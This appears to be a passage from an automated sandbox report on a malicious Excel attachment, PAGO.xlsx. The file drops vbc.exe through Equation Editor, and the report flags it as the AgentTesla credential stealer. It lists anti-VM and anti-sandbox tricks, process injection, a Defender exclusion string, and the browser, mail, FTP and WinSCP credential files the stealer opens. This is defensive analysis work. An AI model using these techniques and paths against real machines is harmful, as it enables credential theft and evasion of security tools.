Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Reads ini files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Reads the hosts file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\Public\vbc.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

SQL strings found in memory and binary data

Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmp	Binary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);

Sample is known by Antivirus

Source: PAGO.xlsx	Virustotal: Detection: 33%
Source: PAGO.xlsx	ReversingLabs: Detection: 33%

Spawns processes

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Document has a 'vbamacros' value indicative of goodware

Source: PAGO.xlsx

Initial sample: OLE indicators vbamacros = False

Document has an 'encrypted' value indicative of goodware

Source: PAGO.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00F98523 push dword ptr [esi+3Fh]; iretd		4_2_00F98535
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00F9928F push FFFFFFD9h; iretd		4_2_00F992AC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D5B3F push esp; retf		4_2_002D5B43
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D5B44 push esp; retf		4_2_002D5B4A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00F98523 push dword ptr [esi+3Fh]; iretd		5_2_00F98535
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00F9928F push FFFFFFD9h; iretd		5_2_00F992AC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00781858 pushfd ; retn 001Dh		5_2_00781859
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00783012 push esp; retf		5_2_00783061
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00781678 push esp; retn 001Dh		5_2_007816C1

Binary may include packed or encrypted code

Source: initial sample

Static PE information: section name: .text entropy: 7.56739593384

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\svchost[1].exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Document contains OLE streams with high entropy indicating encrypted embedded content

Source: PAGO.xlsx

Stream path 'EncryptedPackage' entropy: 7.99945669212 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM3

Source: Yara match	File source: 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 912, type: MEMORY

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\Public\vbc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\Public\vbc.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Contains functionality to detect virtual machines (SLDT)

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00F84CAE sldt word ptr [eax]

4_2_00F84CAE

Contains long sleeps (>= 3 min)

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\Public\vbc.exe	Window / User API: threadDelayed 9200			Jump to behavior
Source: C:\Users\Public\vbc.exe	Window / User API: threadDelayed 546			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2592	Thread sleep time: -420000s >= -30000s			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2904	Thread sleep time: -102988s >= -30000s			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2472	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2016	Thread sleep time: -300000s >= -30000s			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1776	Thread sleep time: -11068046444225724s >= -30000s			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1776	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2404	Thread sleep count: 9200 > 30			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2404	Thread sleep count: 546 > 30			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1776	Thread sleep count: 83 > 30			Jump to behavior

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Contains medium sleeps (>= 30s)

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 102988			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 30000			Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2169797974.00000000024AB000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Queries a list of all running processes

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Enables debug privileges

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: vbc.exe, 00000005.00000002.2368995135.0000000001070000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000005.00000002.2368995135.0000000001070000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000005.00000002.2368995135.0000000001070000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation			Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation			Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior

Queries the cryptographic machine GUID

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Source: Yara match	File source: 00000005.00000002.2368346824.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2369104904.0000000002658000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2369032763.00000000025B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2170048529.000000000347C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 912, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 3048, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.351d880.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.351d880.4.raw.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to steal Mail credentials (via file access)

Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Users\Public\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000005.00000002.2369104904.0000000002658000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2369032763.00000000025B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 3048, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Source: Yara match	File source: 00000005.00000002.2368346824.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2369104904.0000000002658000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2369032763.00000000025B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2170048529.000000000347C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 912, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 3048, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.351d880.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.351d880.4.raw.unpack, type: UNPACKEDPE